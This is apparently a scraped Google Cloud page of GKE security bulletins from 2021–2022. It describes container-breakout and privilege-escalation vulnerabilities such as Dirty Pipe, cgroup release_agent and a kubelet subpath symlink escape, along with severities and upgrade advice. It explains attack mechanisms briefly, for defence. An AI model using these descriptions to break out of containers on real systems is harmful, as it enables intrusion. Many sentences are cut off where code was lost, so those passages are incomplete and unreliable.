A security vulnerability, CVE-2022-23648, has been discovered in containerd's handling of path traversal in the OCI image volume specification. Containers launched through containerd's CRI implementation with a specially-crafted image configuration could gain full read access to arbitrary files and directories on the host. This vulnerability may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy). All GKE on AWS versions are affected. What should I do?The following versions of GKE on AWS have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following GKE on AWS versions. GKE on AWS (current generation)
GKE on AWS (previous generation)
This CVE can be mitigated by setting IgnoreImageDefinedVolumes to true. |
Medium |
GKE on Azure
Description | Severity |
---|---|
A security vulnerability, CVE-2022-23648, has been discovered in containerd's handling of path traversal in the OCI image volume specification. Containers launched through containerd's CRI implementation with a specially-crafted image configuration could gain full read access to arbitrary files and directories on the host. This vulnerability may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy). All GKE on Azure versions are affected. What should I do?The following versions of GKE on Azure have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes as follows:
This CVE can be mitigated by setting IgnoreImageDefinedVolumes to true. |
Medium |
Google Distributed Cloud Virtual for Bare Metal
Updated: 2022-04-22
Description | Severity |
---|---|
A security vulnerability, CVE-2022-23648, has been discovered in containerd's handling of path traversal in the OCI image volume specification. Containers launched through containerd's CRI implementation with a specially-crafted image configuration could gain full read access to arbitrary files and directories on the host. This vulnerability may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy). This vulnerability affects all Google Distributed Cloud Virtual for Bare Metal which use containerd. Google Distributed Cloud Virtual for Bare Metal versions 1.8, 1.9, and 1.10 are affected What should I do?2022-04-22 Update: The following versions of Google Distributed Cloud Virtual for Bare Metal contain code that fixes this vulnerability.
The following versions of Google Distributed Cloud Virtual for Bare Metal have been updated with code to fix this vulnerability. We recommend that you upgrade your nodes to one of the following Google Distributed Cloud Virtual for Bare Metal versions:
This CVE can be mitigated by setting IgnoreImageDefinedVolumes to true. |
Medium |
GCP-2022-012
Published: 2022-04-07
Updated: 2022-11-22
Reference: CVE-2022-0847
2022-11-22 Update: Updated information about workloads using GKE Sandbox.
GKE
Updated: 2022-11-22
Description | Severity |
---|---|
2022-11-22 update: Workloads using GKE Sandbox are not affected by these vulnerabilities. A security vulnerability, CVE-2022-0847, has been discovered in the Linux kernel version 5.8 and later that can potentially escalate container privileges to root. This vulnerability affects all GKE node pool versions v1.22 and later that use Container-Optimized OS images (Container-Optimized OS 93 and later). GKE node pools that use the Ubuntu OS are not affected. What should I do?The versions of Linux node images for the following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node-autoupgrade enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch version of other release channels without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release specific channel. What vulnerabilities are addressed by this patch?CVE-2022-0847 relates to the PIPE_BUF_FLAG_CAN_MERGE flag that was introduced in version 5.8 of the Linux kernel. In this vulnerability, the "flags" member of the new pipe buffer structure was lacking proper initialization in the Linux kernel. An unprivileged local attacker can use this flaw to write to pages in the page cache backed by read only files and escalate their privileges. New versions of Container-Optimized OS that fix this issue have been integrated into the updated node pool versions of GKE. |
High |
GKE on VMware
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0847, has been discovered in the Linux kernel version 5.8 and later that can potentially escalate privileges to root. This vulnerability affects GKE on VMware v1.10 for Container-Optimized OS images. Currently, GKE on VMware with Ubuntu is on kernel version 5.4 and is not vulnerable to this attack. What should I do?The versions of Linux node images for the following versions of GKE on VMware have been updated with code to fix this vulnerability. We recommend that you upgrade your admin and user clusters to the following GKE on VMware version:
What vulnerabilities are addressed by this patch?CVE-2022-0847 relates to the PIPE_BUF_FLAG_CAN_MERGE flag that was introduced in version 5.8 of the Linux kernel. In this vulnerability, the "flags" member of the new pipe buffer structure was lacking proper initialization in the Linux kernel. An unprivileged local attacker can use this flaw to write to pages in the page cache backed by read only files and escalate their privileges. New versions of Container-Optimized OS that fix this issue have been integrated into the updated versions of GKE on VMware. |
High |
GKE on AWS
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0847, has been discovered in the Linux kernel version 5.8 and later that can potentially escalate privileges to root. This vulnerability affects managed clusters of GKE on AWS v1.21 and clusters running on GKE on AWS (previous generation) v1.19, v1.20, v1.21, which use Ubuntu. What should I do?The versions of Linux node images for the following versions of GKE on AWS have been updated with code to fix this vulnerability. For managed GKE on AWS, we recommend that you upgrade your user clusters and nodepool to one of the following versions:
For k-lite GKE on AWS, we recommend that you upgrade your AWSManagementService, AWSCluster and AWSNodePool objects to the following version:
What vulnerabilities are addressed by this patch?CVE-2022-0847 relates to the PIPE_BUF_FLAG_CAN_MERGE flag that was introduced in version 5.8 of the Linux kernel. In this vulnerability, the "flags" member of the new pipe buffer structure was lacking proper initialization in the Linux kernel. An unprivileged local attacker can use this flaw to write to pages in the page cache backed by read only files and escalate their privileges. |
High |
GKE on Azure
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0847, has been discovered in the Linux kernel version 5.8 and later that can potentially escalate privileges to root. This vulnerability affects managed clusters of GKE on Azure v1.21 which use Ubuntu. What should I do?The versions of Linux node images for the following versions of GKE on Azure have been updated with code to fix this vulnerability. We recommend that you upgrade your user clusters and nodepool to the following version:
What vulnerabilities are addressed by this patch?CVE-2022-0847 relates to the PIPE_BUF_FLAG_CAN_MERGE flag that was introduced in version 5.8 of the Linux kernel. In this vulnerability, the "flags" member of the new pipe buffer structure was lacking proper initialization in the Linux kernel. An unprivileged local attacker can use this flaw to write to pages in the page cache backed by read only files and escalate their privileges. |
High |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0847, has been discovered in the Linux kernel version 5.8 and later that can potentially escalate privileges to root. What should I do?There is no action required. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE as it does not include Linux as part of its package. You should ensure that the node images you use are updated to versions that contain the fix for CVE-2022-0847. |
High |
GCP-2022-011
Published: 2022-03-22
Updated: 2022-08-11
2022-08-11 Update: Added more details about the effects of the SMT misconfiguration.
GKE
Description | Severity |
---|---|
Update 2022-08-11: Added more information about the Simultaneous Multi-Threading (SMT) configuration. SMT was intended to be disabled, but was enabled on the versions listed. If you manually enabled SMT for a sandboxed node pool, SMT will remain manually enabled despite this issue. There is a misconfiguration with Simultaneous Multi-Threading (SMT), also known as Hyper-threading, on GKE Sandbox images. The misconfiguration leaves nodes potentially exposed to side channel attacks such as Microarchitectural Data Sampling (MDS) (for more context, see GKE Sandbox documentation). We do not recommend using the following affected versions:
If you manually enabled SMT for a node pool, then this issue does not affect your sandboxed nodes. What should I do?Upgrade your nodes to one of the following versions:
What vulnerability is addressed by this patch?GKE Sandbox nodes have SMT disabled by default, mitigating side-channel attacks. |
Medium |
GCP-2022-009
Published: 2022-03-01
Updated: 2022-03-15
GKE
Description | Severity |
---|---|
Update 2022-03-15: Added hardening guides for GKE on AWS and GKE on Azure. Added a section on persistence using webhooks. Some unexpected paths to access the node VM on GKE Autopilot clusters could have been used to escalate privileges in the cluster. These issues have been fixed and no further action is required. The fixes address issues reported through our Vulnerability Reward Program. GKE Standard and GKE clusters users can optionally apply a similar hardening policy as described below. Technical detailsHost access using third party policy exemptionsIn order to allow Google Cloud to offer full management of nodes, and a Pod-level SLA, GKE Autopilot restricts some highly privileged Kubernetes primitives to limit workloads from having low-level access to the node VM. To set this in context: GKE Standard presents full access to the underlying compute, Autopilot presents limited access, and Cloud Run presents no access. Autopilot relaxes some of those restrictions for a predefined list of third party tools to allow customers to run those tools on Autopilot without modification. Using privileges to create pods with host path mounts, the researcher was able to run a privileged container in a pod that looked like one of these allowlisted third party tools to gain access to the host. The ability to schedule pods in this way is expected on GKE Standard, but not on GKE Autopilot, as it bypassed the host-access restrictions used to enable the SLA described previously. This issue was fixed by tightening the third party allow-listing pod specification. Privilege escalation from root-on-nodeIn addition to the host access, the We have deprecated and removed the As a system hardening measure to prevent this type of attack in the future, we'll apply an Autopilot constraint in an upcoming release that prevents updates to the service account of various objects in the
Addition 2022-03-15: Persistence using mutating webhooksMutating webhooks were used in the report to establish a privileged foothold in the cluster post-compromise. These are standard parts of the Kubernetes API created by cluster admins, and were made visible to administrators when Autopilot added support for customer-defined webhooks. Privileged service accounts in the default namespaceAutopilot policy enforcers previously allowlisted two service accounts in the default namespace: What should I do?All GKE Autopilot clusters have had their policies updated to remove the unintended host access and no further action is required. Further policy hardening will be applied to Autopilot in the coming weeks as a secondary protection. No action is required. GKE Standard clusters and GKE clusters are unaffected as users already have access to the host. As a system hardening measure, GKE Standard clusters and GKE clusters users can apply similar protection with a Gatekeeper policy that prevents privileged workload self-modification. For instructions, refer to the following hardening guides:
|
Low |
GCP-2022-008
Published: 2022-02-23
Updated: 2022-04-28
Reference:
CVE-2022-23606,
CVE-2022-21655,
CVE-2021-43826,
CVE-2021-43825,
CVE-2021-43824,
CVE-2022-21654,
CVE-2022-21657,
CVE-2022-21656
GKE
Description | Severity |
---|---|
The Envoy project recently discovered a set of vulnerabilities, CVE-2022-23606,
CVE-2022-21655,
CVE-2021-43826,
CVE-2021-43825,
CVE-2021-43824,
CVE-2022-21654,
CVE-2022-21657, and
CVE-2022-21656
which may impact GKE clusters using Anthos Service Mesh,
Istio-on-GKE, or custom Istio deployments. All issues listed below are fixed in Envoy release 1.21.1. Technical Background Additional details for these vulnerabilities are available here. What should I do?GKE clusters running Anthos Service Mesh should upgrade to a supported version with fix to the above vulnerabilities
GKE clusters running Istio-on-GKE should upgrade to a supported version with fix to the above vulnerabilities
What vulnerabilities are addressed by this patch?CVE-2022-23606, CVE-2022-21655, CVE-2021-43826, CVE-2021-43825, CVE-2021-43824, CVE-2022-21654, CVE-2022-21657, and CVE-2022-21656 |
High |
GKE on VMware
Updated: 2022-04-28
Description | Severity |
---|---|
Envoy recently released multiple security vulnerability fixes. GKE on VMware is
impacted because Envoy is used with metrics-server. The
Envoy CVEs we are fixing are listed below. We will update this
bulletin with specific versions when they're available:
Istio recently released one security vulnerability fix. Anthos on VMware is impacted because Istio is used for ingress. The Istio CVEs we are fixing are listed below. We will update this bulletin with specific versions when they're available: CVE-2022-23635 (CVSS score 7.5, High): Istiod crashes upon receiving requests with a specially crafted `authorization` header.For the full descriptions and impacts of the above CVEs, please refer to the security bulletins. 2022-04-28 Addition: What should I do?The following versions of GKE on VMware fix these vulnerabilities:
What vulnerabilities are addressed by this patch?CVE-2022-23606, CVE-2022-21655, CVE-2021-43826, CVE-2021-43825, CVE-2021-43824, CVE-2022-21654, CVE-2022-21657, and CVE-2022-21656 |
High |
Google Distributed Cloud Virtual for Bare Metal
Description | Severity |
---|---|
Envoy recently released multiple security vulnerability fixes. Anthos
on Bare metal is impacted because Envoy is used for metrics-server.
The Envoy CVEs we are fixing in release 1.10.3, 1.9.6, and 1.8.9 are
listed below:
For the full descriptions and impacts of the above CVEs, please refer to the security bulletins. What vulnerabilities are addressed by this patch?CVE-2022-23606, CVE-2022-21655, CVE-2021-43826, CVE-2021-43825, CVE-2021-43824, CVE-2022-21654, CVE-2022-21657, and CVE-2022-21656 |
High |
GCP-2022-006
Published: 2022-02-14
Updated: 2022-05-16
2022-05-16 Update: Added GKE version 1.19.16-gke.7800 or later to the list of versions that have code to fix this vulnerability.
2022-05-12 Update: Updated patch versions for GKE,
Google Distributed Cloud Virtual for Bare Metal, GKE on VMware, and GKE on AWS.
Fixed an issue where the security bulletin for GKE on AWS was not
displayed when it was added on 2022-02-23.
GKE
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0492,
has been discovered in the Linux kernel's What should I do?2022-05-16 Update: In addition to the GKE versions mentioned in the 2022-05-12 update, GKE version 1.19.16-gke.7800 or later also contains code that fixes this vulnerability. 2022-05-12 Update: The following versions of GKE contain code that fixes this vulnerability:
Update 2022-02-15: Corrected gVisor statement. The vulnerability is found in the Linux kernel's
Patches will be available in an upcoming release. This bulletin will be updated when they are available. What vulnerability is addressed by this patch?CVE-2022-0492 |
Low |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0492,
has been discovered in the Linux kernel's What should I do?2022-05-12 Update: The following versions of GKE on VMware contain code that fixes this vulnerability. COS
The vulnerability is found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function and can be used as a container breakout. GKE on VMware are unaffected due to protection from the default AppArmor profile on Ubuntu and COS. However, some customers may still be vulnerable if they have loosened security restrictions on pods through modification of the Pod or container securityContext field e.g. by disabling/changing the AppArmor profile, which is not recommended. Patches will be available in an upcoming release. This bulletin will be updated when they are available. What vulnerability is addressed by this patch?CVE-2022-0492 |
Low |
GKE on AWS
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0492,
has been discovered in the Linux kernel's What should I do?2022-05-12 Update: The following versions of current and previous generation GKE on AWS contain code that fixes this vulnerability: Current generation
Update 2022-02-23: Added note for GKE on AWS. GKE on AWS previous and current generations are unaffected due to protection from the default AppArmor profile on Ubuntu. However, some customers may still be vulnerable if they have loosened security restrictions on pods through modification of the Pod or container securityContext field e.g. by disabling/changing the AppArmor profile, which is not recommended. Patches will be available in an upcoming release. This bulletin will be updated when they are available. What vulnerability is addressed by this patch?CVE-2022-0492 |
Low |
GKE Enterprise on
Description | Severity |
---|---|
A security vulnerability, CVE-2022-0492,
has been discovered in the Linux kernel's What should I do?2022-05-12 Update: The following versions of GKE on Azure contain code that fixes this vulnerability:
GKE on Azure are unaffected due to protection from the default AppArmor profile on Ubuntu. However, some customers may still be vulnerable if they have loosened security restrictions on pods through modification of the Pod or container securityContext field e.g. by disabling/changing the AppArmor profile, which is not recommended. Patches will be available in an upcoming release. This bulletin will be updated when they are available. What vulnerability is addressed by this patch?CVE-2022-0492 |
Low |
GCP-2022-005
Published: 2022-02-11Updated: 2022-02-15
Reference: CVE-2021-43527
GKE
Description | Severity |
---|---|
Update 2022-02-15: Some GKE versions mentioned in the original
bulletin were combined with other fixes and had their version numbers incremented prior to release. Patches are available in the following GKE
versions:
A security vulnerability, CVE-2021-43527, has been discovered in any binary that links to the vulnerable versions of libnss3 found in NSS (Network Security Services) versions prior to 3.73 or 3.68.1. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how NSS is used/configured. Both GKE COS and Ubuntu images have a vulnerable version installed, and need to be patched. Potentially, CVE-2021-43527 can have a wide impact across applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS#7, or PKCS#12. As well as applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted. Impact depends on how NSS is used/configured. GKE doesn't use libnss3 for any Internet-accessible APIs. The impact is limited to on-host code running outside containers, which is small due to the minimal design of Chrome OS. GKE code running inside containers using the golang distroless base image is unaffected. What should I do?The versions of Linux node images for the following versions of GKE have been updated with code to fix these vulnerabilities. Upgrade your control plane and nodes to one of the following GKE versions:
What vulnerability is addressed by this patch? |
Medium |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2021-43527, has been discovered in any binary that links to the vulnerable versions of libnss3 found in NSS (Network Security Services) versions prior to 3.73 or 3.68.1. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS. Both GKE on VMware COS and Ubuntu images have a vulnerable version installed, and need to be patched. Potentially, CVE-2021-43527 can have a wide impact across with applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS \#7, or PKCS \#12. As well as applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted. Impact depends on how they configure/use NSS. Anthos on VMware doesn't use libnss3 for any publicly accessible APIs, therefore the impact is limited and this CVE's severity for GKE on VMware is rated as Medium. What should I do?The versions of Linux node images for the following versions of Anthos have been updated with code to fix these vulnerabilities. Upgrade your control plane and nodes to one of the following Anthos versions:
Are you using an GKE on VMware version older than 1.18? You are using an Anthos version out of SLA and should consider upgrading to one of the supported versions. What vulnerability is addressed by this patch? |
Medium |
GKE Enterprise on
Description | Severity |
---|---|
A security vulnerability, CVE-2021-43527, has been discovered in any binary that links to the vulnerable versions of libnss3 found in NSS (Network Security Services) versions prior to 3.73 or 3.68.1. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how NSS is used/configured. Anthos clusters on Azure Ubuntu images have a vulnerable version installed, and need to be patched. Potentially, CVE-2021-43527 can have a wide impact across with applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS#7, or PKCS#12. As well as applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted. Impact depends on how they configure/use NSS. Anthos clusters on Azure doesn't use libnss3 for any publicly accessible APIs, therefore the impact is limited and this CVE's severity for Anthos on Azure is rated as Medium. What should I do?The versions of Linux node images for the following versions of GKE on Azure have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following Anthos on Azure versions:
What vulnerability is addressed by this patch? |
Medium |
GCP-2022-004
Published: 2022-02-04Reference: CVE-2021-4034
GKE
Description | Severity |
---|---|
A security vulnerability, CVE-2021-4034, has been discovered in pkexec, a part of the Linux policy kit package (polkit), that allows an authenticated user to perform a privilege escalation attack. PolicyKit is generally used only on Linux desktop systems to allow non-root users to perform actions such as rebooting the system, installing packages, restarting services etc, as governed by a policy. What should I do?GKE is unaffected because the vulnerable module, policykit-1, is not installed on COS or Ubuntu images used in GKE. No action is required. |
None |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2021-4034, has been discovered in pkexec, a part of the Linux policy kit package (polkit), that allows an authenticated user to perform a privilege escalation attack. PolicyKit is generally used only on Linux desktop systems to allow non-root users to perform actions such as rebooting the system, installing packages, restarting services etc, as governed by a policy. The GKE Enterprise default configuration already gives users full "sudo" privileges, so this exploit does not change GKE Enterprise existing security posture Technical detailsFor this bug to be exploitable, an attacker needs both a non-root shell on the node filesystem and to have the vulnerable version of pkexec installed. While GKE on VMware does include a version of policykit-1 in its release images, the GKE Enterprise default configuration allows passwordless sudo to anyone with shell access already, so this vulnerability does not give a user any more privileges than they already have. What should I do?No action is required. GKE on VMware is unaffected. |
None |
GKE clusters on
Description | Severity |
---|---|
GKE on AWS is unaffected. The vulnerable module, policykit-1, is not installed on Ubuntu images used by the current and previous versions of GKE on AWS. | None |
GKE Enterprise on
Description | Severity |
---|---|
A security vulnerability, CVE-2021-4034, has been discovered in pkexec, a part of the Linux policy kit package (polkit), that allows an authenticated user to perform a privilege escalation attack. PolicyKit is generally used only on Linux desktop systems to allow non-root users to perform actions such as rebooting the system, installing packages, restarting services etc, as governed by a policy. The GKE Enterprise default configuration already gives users full "sudo" privileges, so this exploit does not change GKE Enterprise existing security posture Technical detailsFor this bug to be exploitable, an attacker needs both a non-root shell on the node filesystem and to have the vulnerable version of pkexec installed. While GKE on Azure does include a version of policykit-1 in its release images, the GKE Enterprise default configuration allows passwordless sudo to anyone with shell access already, so this vulnerability does not give a user any more privileges than they already have. What should I do?No action is required. GKE on Azure is unaffected. |
None |
GKE clusters on
Description | Severity |
---|---|
Google Distributed Cloud Virtual for Bare Metal might be affected depending on packages that are installed on the customer-managed operating system. Scan your OS images and patch them if necessary. | None |
GCP-2022-002
Published: 2022-02-01Updated: 2022-03-07
Reference: CVE-2021-4154, CVE-2021-22600, CVE-2022-0185
2022-02-04 Update: Added sections for GKE on AWS and GKE on Azure. Added rollout updates for GKE and GKE on VMware.
GKE
Updated: 2022-03-07
Description | Severity |
---|---|
Three security vulnerabilities, CVE-2021-4154, CVE-2021-22600, and CVE-2022-0185, have been discovered in the Linux kernel, each of which can lead to either a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all node operating systems (COS and Ubuntu) on GKE, GKE on VMware, GKE on AWS (current and previous generation), and GKE on Azure. Pods using GKE Sandbox are not vulnerable to these vulnerabilities. See the COS release notes for more details. Technical detailsIn CVE-2021-4154, an attacker can exploit the CVE-2021-22600 is a double free exploit in packet_set_ring that can lead to a container escape to the host node. With CVE-2022-0185, a heap overflow bug in legacy_parse_param() may lead to an out-of-bounds write that will cause a container breakout. The exploitation path for this vulnerability that relies on the "unshare" syscall is blocked on GKE Autopilot clusters by default using seccomp filtering. Users who have manually enabled the default container runtime seccomp profile on GKE Standard clusters are also protected. What should I do?2022-03-07 Update:The versions of Linux node images for the following versions of GKE have been updated with code to fix all these vulnerabilities for both Ubuntu and COS images. Upgrade your control plane and nodes to one of the following GKE versions.
2022-02-25 Update:If you use Ubuntu node images, 1.22.6-gke.1000 does not address CVE-2021-22600. We will update this bulletin with Ubuntu patch versions when they are available. 2022-02-23 Update: The versions of Linux node images for the following versions of GKE have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following GKE versions.
2022-02-04 Update: The rollout start date for GKE patch versions was February 2. The versions of Linux node images for the following versions of GKE have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following GKE versions.
1.22 and 1.23 versions are also in progress. We will update this bulletin with specific versions when they're available. What vulnerability is addressed by this patch? |
High |
GKE clusters on
Updated: 2022-02-23
Description | Severity |
---|---|
Three security vulnerabilities, CVE-2021-4154, CVE-2021-22600, and CVE-2022-0185, have been discovered in the Linux kernel, each of which can lead to either a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all node operating systems (COS and Ubuntu) on GKE, GKE on VMware, GKE on AWS (current and previous generation), and GKE on Azure. See the COS release notes for more details. Technical detailsIn CVE-2021-4154, an attacker can exploit the CVE-2021-22600 is a double free exploit in packet_set_ring that can lead to a container escape to the host node. With CVE-2022-0185, a heap overflow bug in legacy_parse_param() may lead to an out-of-bounds write that will cause a container breakout. Users who have manually enabled the default container runtime seccomp profile on GKE Standard clusters are also protected. What should I do?2022-02-23 Update: version 1.10.2 (Fixes CVE-2021-22600, CVE-2021-4154, and CVE-2022-0185) is now scheduled for March 1. 2022-02-23 Update: Added patched versions addressing CVE-2021-2260. Version 1.10.1 does not address CVE-2021-22600 but does address the other vulnerabilities. Versions 1.9.4 and 1.10.2, both unreleased, will address CVE-2021-22600. The versions of Linux node images for the following versions of GKE on VMware have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following GKE on VMware versions:
2022-02-04 Update: Added information about Ubuntu images not addressing CVE-2021-22600. The versions of Linux node images for the following versions of GKE on VMware have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following GKE on VMware versions:
What vulnerability is addressed by this patch? |
High |
GKE clusters on
Description | Severity |
---|---|
Three security vulnerabilities, CVE-2021-4154, CVE-2021-22600, and CVE-2022-0185, have been discovered in the Linux kernel, each of which can lead to either a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all node operating systems (COS and Ubuntu) on GKE, GKE on VMware, GKE on AWS (current and previous generation), and GKE on Azure. See the COS release notes for more details. Technical detailsIn CVE-2021-4154, an attacker can exploit the CVE-2021-22600 is a double free exploit in packet_set_ring that can lead to a container escape to the host node. With CVE-2022-0185, a heap overflow bug in legacy_parse_param() may lead to an out-of-bounds write that will cause a container breakout. Users who have manually enabled the default container runtime seccomp profile on GKE Standard clusters are also protected. What should I do?GKE on AWSThe versions of Linux node images for the following versions of GKE on AWS have been updated with code to fix these vulnerabilities. Upgrade your clusters to the following GKE on AWS version:
GKE on AWS (previous generation)The versions of Linux node images for the following versions of GKE on AWS (previous generation) have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following GKE on AWS (previous generation) versions:
What vulnerability is addressed by this patch? |
High |
GKE Enterprise on
Description | Severity |
---|---|
Three security vulnerabilities, CVE-2021-4154, CVE-2021-22600, and CVE-2022-0185, have been discovered in the Linux kernel, each of which can lead to either a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all node operating systems (COS and Ubuntu) on GKE, GKE on VMware, GKE on AWS (current and previous generation), and GKE on Azure. See the COS release notes for more details. Technical detailsIn CVE-2021-4154, an attacker can exploit the CVE-2021-22600 is a double free exploit in packet_set_ring that can lead to a container escape to the host node. With CVE-2022-0185, a heap overflow bug in legacy_parse_param() may lead to an out-of-bounds write that will cause a container breakout. Users who have manually enabled the default container runtime seccomp profile on GKE Standard clusters are also protected. What should I do?The versions of Linux node images for the following versions of GKE on Azure have been updated with code to fix these vulnerabilities. Upgrade your clusters to the following GKE on Azure version:
What vulnerability is addressed by this patch? |
High |
GCP-2021-024
Published: 2021-10-21Reference: CVE-2021-25742
GKE
Description | Severity |
---|---|
A security issue was discovered in the Kubernetes ingress-nginx controller, CVE-2021-25742. Ingress-nginx custom snippets allows retrieval of ingress-nginx service account tokens and secrets across all namespaces. What should I do?This security issue does not impact your GKE cluster infrastructure or any GKE Enterprise environments cluster infrastructure. If you use ingress-nginx in your workload deployments, you should be aware of this security issue. See ingress-nginx Issue 7837 for more details. |
None |
GKE clusters on
Description | Severity |
---|---|
A security issue was discovered in the Kubernetes ingress-nginx controller, CVE-2021-25742. Ingress-nginx custom snippets allows retrieval of ingress-nginx service account tokens and secrets across all namespaces. What should I do?This security issue does not impact your GKE cluster infrastructure or any GKE Enterprise environments cluster infrastructure. If you use ingress-nginx in your workload deployments, you should be aware of this security issue. See ingress-nginx Issue 7837 for more details. |
None |
GKE clusters on
Description | Severity |
---|---|
A security issue was discovered in the Kubernetes ingress-nginx controller, CVE-2021-25742. Ingress-nginx custom snippets allows retrieval of ingress-nginx service account tokens and secrets across all namespaces. What should I do?This security issue does not impact your GKE cluster infrastructure or any GKE Enterprise environments cluster infrastructure. If you use ingress-nginx in your workload deployments, you should be aware of this security issue. See ingress-nginx Issue 7837 for more details. |
None |
GKE clusters on
Description | Severity |
---|---|
A security issue was discovered in the Kubernetes ingress-nginx controller, CVE-2021-25742. Ingress-nginx custom snippets allows retrieval of ingress-nginx service account tokens and secrets across all namespaces. What should I do?This security issue does not impact your GKE cluster infrastructure or any GKE Enterprise environments cluster infrastructure. If you use ingress-nginx in your workload deployments, you should be aware of this security issue. See ingress-nginx Issue 7837 for more details. |
None |
GCP-2021-019
Published: 2021-09-29GKE
Description | Severity |
---|---|
There is a known issue where updating a Am I impacted?If your kubectl get backendconfigs -A -o json | \ jq -r '.items[] | select(.spec.securityPolicy == {}) | .metadata | "\(.namespace)/\(.name)"'
This issue affects the following GKE versions:
If you do not configure Google Cloud Armor on your Ingress resources via the What should I do?Upgrade your GKE control plane to one of the following updated versions that
patches this issue and allows
This issue can also be prevented by avoiding the deployment of To prevent this issue, only make updates to your Since the The following sample manifest describes a apiVersion: cloud.google.com/v1 kind: BackendConfig metadata: name: my-backend-config spec: securityPolicy: name: "ca-how-to-security-policy" If you have CI/CD systems or tools which regularly update |
Low |
GCP-2021-022
Published: 2021-09-23GKE clusters on
Description | Severity |
---|---|
A vulnerability has been discovered in the GKE Enterprise Identity Service (AIS) LDAP module of GKE on VMware versions 1.8 and 1.8.1 where a seed key used in generating keys is predictable. With this vulnerability, an authenticated user could add arbitrary claims and escalate privileges indefinitely. Technical detailsA recent addition to AIS code creates symmetric keys using golang's math/rand module, which is not suitable for security-sensitive code. The module is used in a way that will generate a predictable key. During identity verification, a secure token service (STS) key is generated that is subsequently encrypted with a symmetric key that is simple to derive. What should I do?This vulnerability only affects customers using AIS in GKE on VMware versions 1.8 and 1.8.1. For users of GKE on VMware 1.8, upgrade your clusters to the following version:
|
High |
GCP-2021-021
Published: 2021-09-22Reference: CVE-2020-8561
GKE
Description | Severity |
---|---|
A security vulnerability, CVE-2020-8561,
has been discovered in Kubernetes where certain webhooks can be made to
redirect Technical detailsWith this vulnerability, actors who control the responses of
This issue can be mitigated by changing certain parameters for the API server. What should I do?No action is required at this time. Currently available versions of GKE and GKE Enterprise have implemented the following mitigations that protect against this type of attack:
What vulnerability is addressed by this patch?CVE-2020-8561 |
Medium |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2020-8561,
has been discovered in Kubernetes where certain webhooks can be made to
redirect Technical detailsWith this vulnerability, actors who control the responses of
This issue can be mitigated by changing certain parameters for the API server. What should I do?No action is required at this time. Currently available versions of GKE and GKE Enterprise have implemented the following mitigations that protect against this type of attack:
What vulnerability is addressed by this patch?CVE-2020-8561 |
Medium |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2020-8561,
has been discovered in Kubernetes where certain webhooks can be made to
redirect Technical detailsWith this vulnerability, actors who control the responses of
This issue can be mitigated by changing certain parameters for the API server. What should I do?No action is required at this time. Currently available versions of GKE and GKE Enterprise have implemented the following mitigations that protect against this type of attack:
What vulnerability is addressed by this patch?CVE-2020-8561 |
Medium |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2020-8561,
has been discovered in Kubernetes where certain webhooks can be made to
redirect Technical detailsWith this vulnerability, actors who control the responses of
This issue can be mitigated by changing certain parameters for the API server. What should I do?No action is required at this time. Currently available versions of GKE and GKE Enterprise have implemented the following mitigations that protect against this type of attack:
What vulnerability is addressed by this patch?CVE-2020-8561 |
Medium |
GCP-2021-018
Published: 2021-09-15Updated: 2021-09-24
Reference: CVE-2021-25741
2021-09-24 update: GKE on Bare Metal bulletin updated with additional patched versions.
2021-09-20 update: Bulletins added for GKE on Bare Metal
2021-09-16 update: Bulletins added for GKE on VMware
GKE
Description | Severity |
---|---|
A security issue was discovered in Kubernetes, CVE-2021-25741, where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem. Technical details:In CVE-2021-25741, the attacker can create a symbolic link from a mounted emptyDir to the root filesystem of the node ( / ), the kubelet will follow the symlink and mount the host root into the container.What should I do?We recommend you to upgrade your node pools to one of the following versions or above to take advantage of the latest patches:
The following versions also contain the fix:
|
High |
GKE clusters on
Description | Severity |
---|---|
